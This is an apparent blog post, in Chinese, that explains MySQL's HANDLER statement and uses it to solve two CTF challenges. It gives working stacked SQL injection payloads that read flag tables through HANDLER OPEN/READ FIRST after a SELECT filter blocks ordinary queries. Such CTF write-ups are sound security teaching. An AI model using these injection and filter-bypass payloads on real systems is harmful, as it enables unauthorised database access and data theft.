当前位置: 首页 > news >正文

HANDLER命令

HANDLER命令

HANDLER 是 MySQL 和 MariaDB 特有的非标准 SQL 语句。它允许你直接与存储引擎(如 InnoDB, MyISAM)进行交互,绕过 SQL 优化器。

使用 HANDLER 通常分为三步:打开表、读取数据、关闭表。

HANDLER table_name OPEN;      -- 打开表的句柄
HANDLER table_name READ (FIRST/NEXT/索引名 = ('值'));  -- 读取数据  
--HANDLER users READ idx = ('admin');  读取idx索引中值为'admin'的行 
HANDLER table_name CLOSE;     -- 关闭句柄

用途
直接逐行读取表数据,无需指定列名,适合探测未知表结构。

列题[GYCTF2020]Blacklist1

查1'发现显示

1b1402b4-7e97-46ef-bd88-c0cf8803c37f

过滤了好多东西,可以使用堆叠注入

试试show tables和show databases,发现FlagHere,(查数据库是一个伏笔

e7333a66-2f2f-46c2-8a0d-f00700aeaf7a

46a0b497-f705-4e7d-b7fd-f37da8e9fbe9

slelect因为被过滤了,所以使用handler命令

挨个用库试试,最后试到supersqli,下面就是语句了

?inject=1';                   -- 闭合原查询并结束语句
use supersqli;                -- 切换到数据库 `supersqli`
HANDLER FlagHere OPEN;        -- 打开表 `FlagHere` 的句柄
HANDLER FlagHere READ FIRST;  -- 读取表的第一行数据
HANDLER FlagHere CLOSE;       -- 关闭句柄

完整拼接后的SQL(假设原查询为SELECT * FROM table WHERE id='用户输入'):

SELECT * FROM table WHERE id='1';
USE supersqli;
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;

例题ctfshowweb225

daa1ecd4-ad0e-44e7-8279-8352e2cb5ea7

前三部分用show拿信息

username=';show%20databases;
username=';show%20tables%20from%20ctfshow_web; 
username=';show%20columns%20from%20ctfshow_web.ctfshow_flagasa; 

禁用了select,我们用handler来读取

username=';handler%20ctfshow_flagasa%20open;handler%20ctfshow_flagasa%20read%20first;HANDLER%20ctfshow_flagasa%20CLOSE;

http://www.jsqmd.com/news/129275/

相关文章:

  • 2025年靠谱江苏绿色建材品牌排行榜,博康特纳米橡塑保温隔声板推荐 - myqiye
  • Open-AutoGLM性能优化全攻略:提升推理速度300%的7个关键技巧
  • 2025-2026北京海淀刑事纠纷律师事务所口碑排名白皮书:权威解析靠谱机构实力 - 苏木2025
  • 结合ASR技术实现语音提问——anything-llm输入方式扩展
  • 从技术角度理解显卡云电脑:显卡云电脑为何可以满足游戏挂机用途
  • 2025年专业瓷砖修复服务推荐排行榜,新测评精选瓷砖修复服务商推荐 - 工业品牌热点
  • AI驱动GEO优化新纪元:广州服务商的技术深耕与商业赋能 - 品牌推荐排行榜
  • 2025年年终产品管理平台推荐:技术架构与效能度量双维度实测TOP5榜单 - 十大品牌推荐
  • 【智谱Open-AutoGLM本地部署终极指南】:手把手教你零基础搭建AI自动化系统
  • AI驱动GEO优化新生态:广东头部服务商实力解析与选型指南 - 品牌推荐排行榜
  • LangFlow Fathom简单美观的统计
  • 留学申诉十大机构排名:凯琛留学、路觅教育领衔专业护航 - 品牌评测分析
  • 作文高手必修课:想让孩子告别流水账?先掌握“写人”与“写事”的核心结构!
  • AI驱动GEO优化新生态:广州服务商的技术深耕与商业赋能路径 - 品牌推荐排行榜
  • 2025终极福利!8款免费AI工具一键搞定论文开题报告与正文写作!
  • 2025年12月健康管理,健康管理设备,智慧健康养老管理公司推荐:全链条方案与服务口碑深度测评 - 品牌鉴赏师
  • 2025年年终产品管理系统推荐:技术实力与客户案例双维度实测盘点 - 十大品牌推荐
  • 天机学堂day12学习(完结撒花) - 教程
  • 2025年口碑好的钱币品牌推荐榜 - 品牌宣传支持者
  • 实现逆变器Modbus转IEC 104协议接入电力监控系统项目案例 - vfbox
  • 豆包GEO优化新生态:精准流量争夺下的优质服务商优选指南 - 品牌推荐排行榜
  • Open-AutoGLM浏览器助手实战指南:5大核心功能让你秒变自动化高手
  • 西安不锈钢水箱制造商厂家推荐,看哪家实力凸显? - 工业推荐榜
  • 2025年专业食品加工降温设备厂家排名,渔船/大型工厂降温设备品牌推荐 - myqiye
  • CAP定理
  • 河南种子会的参与度高吗?对农业增产有作用吗? - 工业推荐榜
  • Qt与MySQL连接过程中出现“QSqlDatabase: QMYSQL driver not loaded”问题
  • 收藏!从7年Java到AI应用工程师:裸辞All in AI一年,我的蜕变全记录
  • Open-AutoGLM开源地址泄露?(内部人员透露的真实仓库链接已验证)
  • 2025年年终产品管理平台推荐:核心技术能力实测与五大品牌对比研究 - 十大品牌推荐